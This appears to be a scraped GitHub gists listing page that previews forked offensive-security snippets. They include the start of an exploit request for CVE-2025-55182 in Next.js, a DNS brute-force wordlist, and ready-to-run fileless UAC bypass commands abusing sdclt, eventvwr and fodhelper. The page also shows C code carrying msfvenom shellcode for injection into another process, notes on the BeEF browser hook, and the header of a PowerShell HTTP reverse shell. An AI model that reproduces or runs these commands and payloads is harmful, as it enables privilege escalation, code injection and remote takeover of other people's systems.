Some notes and techniques for reverse engineering Webpack (and a little bit about React/Vue/Angular) apps.
Malayke
Malayke
/ CVE-2025-55182.http
Created
December 5, 2025 02:56
— forked from maple3142/CVE-2025-55182.http
tested on next.js 16.0.6, might need some changes to be applied to other RSC frameworks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0 | |
| Next-Action: x | |
| X-Nextjs-Request-Id: b5dce965 | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 | |
| Content-Length: 565 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad |
Malayke
/ reverse-engineering-webpack-apps.md
Created
October 20, 2025 10:38
— forked from 0xdevalias/reverse-engineering-webpack-apps.md
Some notes and techniques for reverse engineering Webpack (and a little bit about React/Vue/Angular) apps
Malayke
/ all.txt
Created
April 11, 2022 15:22
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #sdclt fileless UAC bypass | |
| regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| #eventvwr fileless UAC bypass | |
| %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec; | |
| #fodhelper fileless UAC bypass | |
| New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\ |
Malayke
/ release-android-debuggable.md
Created
November 4, 2018 13:38
— forked from nstarke/release-android-debuggable.md
How to make a Release Android App debuggable
Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage
( or adb shell run-as com.mypackge ls /data/data/com.mypackage/shared_prefs),
but on a production release app downloaded from an app store you're most likely to see:
run-as: Package 'com.mypackage' is not debuggable
Malayke
/ NotCreateRemoteThread.c
Created
September 9, 2018 15:10
— forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma comment(lib, "Shell32.lib") | |
| #include <windows.h> | |
| #include <shlobj.h> | |
| // msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
| int buf_len = 193; | |
| unsigned char buf[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
| "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" |
Malayke
/ getMoreDomains.py
Created
September 9, 2018 05:02
— forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import pprint | |
| import sys | |
| import dns.message | |
| import dns.query | |
| import dns.rdatatype | |
| import dns.resolver | |
| import dns.reversename | |
| import time |
Malayke
/ Build_In_Memory_CSharp_Project.txt
Created
April 6, 2018 02:29
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |
Malayke
/ how beef gathers browser details on initialization
Created
March 26, 2017 15:19
— forked from xntrik/how beef gathers browser details on initialization
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client | |
| https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM | |
| window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24 | |
| Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67 | |
| Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |
NewerOlder